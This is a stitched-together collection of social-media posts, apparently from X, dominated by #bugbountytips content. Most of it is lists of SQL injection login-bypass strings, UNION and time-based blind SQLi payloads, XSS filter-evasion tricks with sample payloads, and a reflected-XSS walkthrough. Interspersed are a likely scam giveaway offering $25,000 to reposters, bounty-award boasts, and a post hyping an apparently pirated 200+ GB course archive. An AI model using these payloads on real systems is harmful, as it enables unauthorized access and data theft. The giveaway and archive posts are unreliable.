MY FIRST X VIDEO MADE OVER $250,000! 😲 But it’s a bit of a facade. Advertisers saw the attention it was getting and bought ads on my video (I think) and thus my revenue per view is prob higher than what you’d experience

I’m gonna give 10 random people that repost this and follow me $25,000 for fun (the $250,000 my X video made) I’ll pick the winners in 72 hours

Make me win

SQL Injection - Bypass Auth Payloads #bugbountytips #bugbountytip " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or 1=1-- or true-- " or true-- ' or true-- ")or true-- ') or true-- ' or 'x'='x ) or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x

Auth bypass Via SQL Injection Payloads #bugbountytips #bugbountytips ' or 'a'='a ' or a=a-- ' or a=a– ') or ('a'='a " or "a"="a ") or ("a"="a ') or ('a'='a and hi") or ("a"="a ' or 'one'='one ' or 'one'='one– ' or uid like '% ' or uname like '% ' or userid like '%

payloads by Auth Bypass ' OORR 1<2 # admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* #bugbountytips #bugbountytip

here are some tips that are used to easily find sql-Injection 70% /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1''asd'' <== concat string Thanks #bugbountytips

Good

XSS WAF Bypassing. #bugbountytip #bugbountytips 1) alert = window["al"+"ert"] 2) bypass()with `` 3) replace space with / 4) encode symbols: 🔹< = %3c 🔹> = %3e 🔹" = %22 🔹[ = %5b 🔹] = %5d 🔹` = %60 Not Encoded Payload: <svg/onload=window["al"+"ert"]`1337`>

Auth Bypass via SQL ') or ('a'='a and hi") or ("a"="a ' UNION ALL SELECT 1, @version;# ' UNION ALL SELECT system_user(),user();# ' UNION select table_schema,table_name FROMinformation_Schema.tables;# admin' and substring(password/text(),1,1)='7 #bugbountytip

SQLi Payload: ' OR IF(ASCII(SUBSTR(user(),1,1))=114,SLEEP(5),0)-- Response delay reveals

Alhamdulillah, I awarded $2750 from HackerOne Vulnerable: Account Takeover Tips: always check everything and function,check login history and update passwd or reused #bugbounty Bug : rate limit otp bypass

SQLi To Auth bypass ' group by password having 1=1-- ' group by userid having 1=1-- ' group by username having 1=1- information_Schema.tables;# admin' and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7 #bubountytip #bubountytips

🧠💣 381 FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: 🔥 OSCP 🔥 OSEP 🔥 OSWE 🔥 THM / HTB 🔥 EC-Council 🔥 Cisco CyberOps 🔥 Linux Priv Esc 🔥 PEN-300 Full Video Series 🔥 BloodHound, AD, SSH, API, SQL, 🔥

Yeah awarded 1000 usd Ato via rate limit

IDOR on user profile update IDOR via email enumeration IDOR on subscription APIs Broken object-level authorization in API Reflected XSS in search bar Stored XSS in comments DOM-based XSS in JS-heavy pages Open redirect via query param Open redirect with base64 trick

Bug: XSS 1. Take url:http://login. target. com/return_url=sbsbHsjdbdsbsb= 2. Change to basic xss payload (no work) "><img src=x onerror=prompt(1)> 3. Change to basic payload encoded like Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KDEpPg==

What the heck?! Is it normal for a report to be marked as a duplicate of a resolved one? #BugBounty